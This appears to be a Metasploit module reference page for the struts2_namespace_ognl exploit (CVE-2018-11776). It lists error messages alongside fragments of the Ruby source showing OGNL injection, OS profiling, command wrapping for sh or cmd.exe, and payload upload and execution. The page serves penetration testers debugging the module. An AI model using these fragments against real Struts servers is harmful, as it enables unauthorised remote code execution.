- OGNL request cannot contain a '<C>'
- Server returned HTTP 404, please double check TARGETURI and ACTION options
- Server returned HTTP 400, consider toggling the ENABLE_STATIC option
- Failed to profile target. Response from server: <R.TO_S>
- Target responded with unexpected profiling data
- Failed to profile target. Response from server: <R.TO_S>
- Server did not respond properly to profiling attempt.
- Target profiling was unable to determine operating system
- WARNING: Command contains bad characters: semicolons (;).
- Failed to detect target OS. Attempting to execute command directly
- Payload sent, but no output provided from server.
- Failed to run command. Response from server: <R.TO_S>
- HEADER parameter cannot be blank when sending a payload
- HEADER parameter cannot be blank when sending a payload
- RESPONSE
- Target did not successfully execute the request
- Target reported an unspecified error while executing the payload
- Unable to create and locate file on target. Try a cmd/*/generic payload
- Unable to create and locate file. Try a cmd/*/generic payload
- OGNL payload upload did not respond
- OGNL payload upload failed
- Target did not successfully execute the request
- Target reported an unspecified error while attempting to execute the payload
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Target did not respond. Please double check RHOSTS and RPORT
Here is a relevant code snippet related to the "Target did not respond. Please double check RHOSTS and RPORT" error message:
125: CheckCode::Vulnerable
126: else
127: CheckCode::Safe
128: end
129: elsif resp.nil?
130: fail_with(Failure::Unreachable,"Target did not respond. Please double check RHOSTS and RPORT")
131: end
132: end
133:
134: def exploit
135: case payload.arch.first
Bad OGNL request: <OGNL>
Here is a relevant code snippet related to the "Bad OGNL request: <OGNL>" error message:
149: # '\n' ends the GET request prematurely
150:
151: bad_chars = %w[; \\ \r \n] # and maybe '/'
152: bad_chars.each do |c|
153: if ognl.include? c
154: print_error("Bad OGNL request: #{ognl}")
155: fail_with(Failure::BadConfig, "OGNL request cannot contain a '#{c}'")
156: end
157: end
158:
159: # The following list of characters *must* be encoded or ORNL will asplode
OGNL request cannot contain a '<C>'
Here is a relevant code snippet related to the "OGNL request cannot contain a '<C>'" error message:
150:
151: bad_chars = %w[; \\ \r \n] # and maybe '/'
152: bad_chars.each do |c|
153: if ognl.include? c
154: print_error("Bad OGNL request: #{ognl}")
155: fail_with(Failure::BadConfig, "OGNL request cannot contain a '#{c}'")
156: end
157: end
158:
159: # The following list of characters *must* be encoded or ORNL will asplode
160: encodable_chars = { "%": "%25", # Always do this one first. :-)
Server returned HTTP 404, please double check TARGETURI and ACTION options
Here is a relevant code snippet related to the "Server returned HTTP 404, please double check TARGETURI and ACTION options" error message:
206: 'method' => datastore['HTTPMethod'],
207: 'headers' => headers
208: )
209:
210: if r && r.code == 404
211: fail_with(Failure::UnexpectedReply, "Server returned HTTP 404, please double check TARGETURI and ACTION options")
212: end
213:
214: return r
215: end
216:
Server returned HTTP 400, consider toggling the ENABLE_STATIC option
Here is a relevant code snippet related to the "Server returned HTTP 400, consider toggling the ENABLE_STATIC option" error message:
235: ognl = ognl[0...-4]
236:
237: r = send_struts_request(ognl)
238:
239: if r.code == 400
240: fail_with(Failure::UnexpectedReply, "Server returned HTTP 400, consider toggling the ENABLE_STATIC option")
241: elsif r.headers['Location']
242: # r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'
243: # Extract the OGNL output from the Location path, and strip the two random chars
244: s = r.headers['Location'].split('/')[1][2..-1]
245:
Failed to profile target. Response from server: <R.TO_S>
Here is a relevant code snippet related to the "Failed to profile target. Response from server: <R.TO_S>" error message:
250: end
251:
252: # Confirm that all fields were returned, and non include extra (:) delimiters
253: # If the OGNL fails, we might get a partial result back, in which case, we'll abort.
254: if s.count(':') > properties.length
255: print_error("Failed to profile target. Response from server: #{r.to_s}")
256: fail_with(Failure::UnexpectedReply, "Target responded with unexpected profiling data")
257: end
258:
259: # Separate the colon-delimited properties and store in the 'properties' hash
260: s = s.split(':')
Target responded with unexpected profiling data
Here is a relevant code snippet related to the "Target responded with unexpected profiling data" error message:
251:
252: # Confirm that all fields were returned, and non include extra (:) delimiters
253: # If the OGNL fails, we might get a partial result back, in which case, we'll abort.
254: if s.count(':') > properties.length
255: print_error("Failed to profile target. Response from server: #{r.to_s}")
256: fail_with(Failure::UnexpectedReply, "Target responded with unexpected profiling data")
257: end
258:
259: # Separate the colon-delimited properties and store in the 'properties' hash
260: s = s.split(':')
261: i = 0
Failed to profile target. Response from server: <R.TO_S>
Here is a relevant code snippet related to the "Failed to profile target. Response from server: <R.TO_S>" error message:
266:
267: print_good("Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}" +
268: " #{properties[:'os.arch']}, running as #{properties[:'user.name']}")
269: return properties
270: else
271: print_error("Failed to profile target. Response from server: #{r.to_s}")
272: fail_with(Failure::UnexpectedReply, "Server did not respond properly to profiling attempt.")
273: end
274: end
275:
276: def profile_os
Server did not respond properly to profiling attempt.
Here is a relevant code snippet related to the "Server did not respond properly to profiling attempt." error message:
267: print_good("Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}" +
268: " #{properties[:'os.arch']}, running as #{properties[:'user.name']}")
269: return properties
270: else
271: print_error("Failed to profile target. Response from server: #{r.to_s}")
272: fail_with(Failure::UnexpectedReply, "Server did not respond properly to profiling attempt.")
273: end
274: end
275:
276: def profile_os
277: # Probe for the target OS and architecture
Target profiling was unable to determine operating system
Here is a relevant code snippet related to the "Target profiling was unable to determine operating system" error message:
277: # Probe for the target OS and architecture
278: begin
279: properties = send_profile()
280: os = properties[:'os.name'].downcase
281: rescue
282: vprint_warning("Target profiling was unable to determine operating system")
283: os = ''
284: os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'
285: os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'
286: os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'
287: end
WARNING: Command contains bad characters: semicolons (;).
Here is a relevant code snippet related to the "WARNING: Command contains bad characters: semicolons (;)." error message:
289: end
290:
291: def execute_command(cmd_input, opts={})
292: # Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that.
293: if cmd_input.include? ';'
294: print_warning("WARNING: Command contains bad characters: semicolons (;).")
295: end
296:
297: os = profile_os()
298:
299: if os && ((os.include? 'linux') || (os.include? 'nix'))
Failed to detect target OS. Attempting to execute command directly
Here is a relevant code snippet related to the "Failed to detect target OS. Attempting to execute command directly" error message:
299: if os && ((os.include? 'linux') || (os.include? 'nix'))
300: cmd = "{'sh','-c','#{cmd_input}'}"
301: elsif os && (os.include? 'win')
302: cmd = "{'cmd.exe','/c','#{cmd_input}'}"
303: else
304: vprint_error("Failed to detect target OS. Attempting to execute command directly")
305: cmd = cmd_input
306: end
307:
308: # The following OGNL will run arbitrary commands on Windows and Linux
309: # targets, as well as returning STDOUT and STDERR. In my testing,
Payload sent, but no output provided from server.
Here is a relevant code snippet related to the "Payload sent, but no output provided from server." error message:
324:
325: if r && r.code == 200
326: print_good("Command executed:\n#{r.body}")
327: elsif r
328: if r.body.length == 0
329: print_status("Payload sent, but no output provided from server.")
330: elsif r.body.length > 0
331: print_error("Failed to run command. Response from server: #{r.to_s}")
332: end
333: end
334: end
Failed to run command. Response from server: <R.TO_S>
Here is a relevant code snippet related to the "Failed to run command. Response from server: <R.TO_S>" error message:
326: print_good("Command executed:\n#{r.body}")
327: elsif r
328: if r.body.length == 0
329: print_status("Payload sent, but no output provided from server.")
330: elsif r.body.length > 0
331: print_error("Failed to run command. Response from server: #{r.to_s}")
332: end
333: end
334: end
335:
336: def send_payload
HEADER parameter cannot be blank when sending a payload
Here is a relevant code snippet related to the "HEADER parameter cannot be blank when sending a payload" error message:
334: end
335:
336: def send_payload
337: data_header = datastore['HEADER']
338: if data_header.empty?
339: fail_with(Failure::BadConfig, "HEADER parameter cannot be blank when sending a payload")
340: end
341:
342: payload = generate_payload_exe
343: print_status("Generated #{payload.length} byte binary payload")
344: payload_b64 = [payload].pack("m").delete("\n")
HEADER parameter cannot be blank when sending a payload
Here is a relevant code snippet related to the "HEADER parameter cannot be blank when sending a payload" error message:
351: end
352:
353: def send_payload_oneshot(payload)
354: data_header = datastore['HEADER']
355: if data_header.empty?
356: fail_with(Failure::BadConfig, "HEADER parameter cannot be blank when sending a payload")
357: end
358:
359: random_filename = datastore['TEMPFILE']
360:
361: # d = payload data
RESPONSE
Here is a relevant code snippet related to the "RESPONSE" error message:
382: r = send_struts_request(ognl, payload: payload)
383:
384: if r && r.headers && r.headers['Location'].split('/')[1] == success_string
385: print_good("Payload successfully dropped and executed.")
386: elsif r && r.headers['Location']
387: vprint_error("RESPONSE: " + r.headers['Location'])
388: fail_with(Failure::PayloadFailed, "Target did not successfully execute the request")
389: elsif r && r.code == 400
390: fail_with(Failure::UnexpectedReply, "Target reported an unspecified error while executing the payload")
391: end
392: end
Target did not successfully execute the request
Here is a relevant code snippet related to the "Target did not successfully execute the request" error message:
383:
384: if r && r.headers && r.headers['Location'].split('/')[1] == success_string
385: print_good("Payload successfully dropped and executed.")
386: elsif r && r.headers['Location']
387: vprint_error("RESPONSE: " + r.headers['Location'])
388: fail_with(Failure::PayloadFailed, "Target did not successfully execute the request")
389: elsif r && r.code == 400
390: fail_with(Failure::UnexpectedReply, "Target reported an unspecified error while executing the payload")
391: end
392: end
393:
Target reported an unspecified error while executing the payload
Here is a relevant code snippet related to the "Target reported an unspecified error while executing the payload" error message:
385: print_good("Payload successfully dropped and executed.")
386: elsif r && r.headers['Location']
387: vprint_error("RESPONSE: " + r.headers['Location'])
388: fail_with(Failure::PayloadFailed, "Target did not successfully execute the request")
389: elsif r && r.code == 400
390: fail_with(Failure::UnexpectedReply, "Target reported an unspecified error while executing the payload")
391: end
392: end
393:
394: def ognl_create_file()
395: filename = datastore['TEMPFILE']
Unable to create and locate file on target. Try a cmd/*/generic payload
Here is a relevant code snippet related to the "Unable to create and locate file on target. Try a cmd/*/generic payload" error message:
406:
407: begin
408: tempfile = r.headers['Location']
409: tempfile = tempfile[1..-(2+datastore['ACTION'].length)]
410: if tempfile.empty?
411: fail_with(Failure::UnexpectedReply,"Unable to create and locate file on target. Try a cmd/*/generic payload")
412: end
413: rescue
414: fail_with(Failure::UnexpectedReply,"Unable to create and locate file. Try a cmd/*/generic payload")
415: end
416:
Unable to create and locate file. Try a cmd/*/generic payload
Here is a relevant code snippet related to the "Unable to create and locate file. Try a cmd/*/generic payload" error message:
409: tempfile = tempfile[1..-(2+datastore['ACTION'].length)]
410: if tempfile.empty?
411: fail_with(Failure::UnexpectedReply,"Unable to create and locate file on target. Try a cmd/*/generic payload")
412: end
413: rescue
414: fail_with(Failure::UnexpectedReply,"Unable to create and locate file. Try a cmd/*/generic payload")
415: end
416:
417: return tempfile
418: end
419:
OGNL payload upload did not respond
Here is a relevant code snippet related to the "OGNL payload upload did not respond" error message:
467: begin
468: if r.headers['Location'].include? success_string
469: vprint_good("OGNL payload chunk sent successfully.")
470: return
471: else
472: fail_with(Failure::UnexpectedReply, "OGNL payload upload did not respond")
473: end
474: rescue
475: fail_with(Failure::UnexpectedReply, "OGNL payload upload failed")
476: end
477: end
OGNL payload upload failed
Here is a relevant code snippet related to the "OGNL payload upload failed" error message:
470: return
471: else
472: fail_with(Failure::UnexpectedReply, "OGNL payload upload did not respond")
473: end
474: rescue
475: fail_with(Failure::UnexpectedReply, "OGNL payload upload failed")
476: end
477: end
478:
479: def ognl_execute(file)
480: file_header = datastore['HEADER'] + 'f'
Target did not successfully execute the request
Here is a relevant code snippet related to the "Target did not successfully execute the request" error message:
497:
498: begin
499: if r.code==302
500: print_good("OGNL payload executed successfully.")
501: else
502: fail_with(Failure::PayloadFailed, "Target did not successfully execute the request")
503: end
504: rescue
505: vprint_status("TARGET RESPONDED: #{r.to_s}")
506: fail_with(Failure::UnexpectedReply, "Target reported an unspecified error while attempting to execute the payload")
507: end
Target reported an unspecified error while attempting to execute the payload
Here is a relevant code snippet related to the "Target reported an unspecified error while attempting to execute the payload" error message:
499: if r.code==302
500: print_good("OGNL payload executed successfully.")
501: else
502: fail_with(Failure::PayloadFailed, "Target did not successfully execute the request")
503: end
504: rescue
505: vprint_status("TARGET RESPONDED: #{r.to_s}")
506: fail_with(Failure::UnexpectedReply, "Target reported an unspecified error while attempting to execute the payload")
507: end
508: end
509: end
Go back to menu.
Related Pull Requests
- #11127 Merged Pull Request: Fix TARGETURI support in struts2_namespace_ognl
- #10973 Merged Pull Request: Rework DisclosureDate check in msftidy, including ISO 8601 support
- #10671 Merged Pull Request: CVE-2018-11776
struts2_namespace_ognl
support for variations in Tomcat - #10546 Merged Pull Request: CVE-2018-11776: Struts Namespace RCE
References
- CVE-2018-11776
- https://lgtm.com/blog/apache_struts_CVE-2018-11776
- https://cwiki.apache.org/confluence/display/WW/S2-057
- https://github.com/hook-s3c/CVE-2018-11776-Python-PoC
See Also
Check also the following modules related to this module:
- exploit/multi/http/struts2_code_exec_showcase
- exploit/multi/http/struts2_content_type_ognl
- exploit/multi/http/struts2_multi_eval_ognl
- exploit/multi/http/struts2_rest_xstream
- exploit/linux/http/atlassian_confluence_webwork_ognl_injection
- exploit/multi/http/apache_roller_ognl_injection
- exploit/multi/http/atlassian_confluence_namespace_ognl_injection
- exploit/multi/http/atlassian_confluence_webwork_ognl_injection
- exploit/linux/local/nested_namespace_idmap_limit_priv_esc
Related Nessus plugins:
- Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)
- Apache Struts CVE-2018-11776 Results With No Namespace Remote Code Execution (S2-057) (remote)
- Cisco Identity Services Engine Struts2 Namespace Vulnerability
- Cisco Unified Communications Manager IM & Presence Service Apache Struts RCE (CSCvm14049)
- Cisco Unified Communication Manager Apache Struts RCE (CSCvm14042)
Authors
- Man Yue Mo
- hook-s3c
- asoto-r7
- wvu
Version
This page has been produced using Metasploit Framework version 6.2.4-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.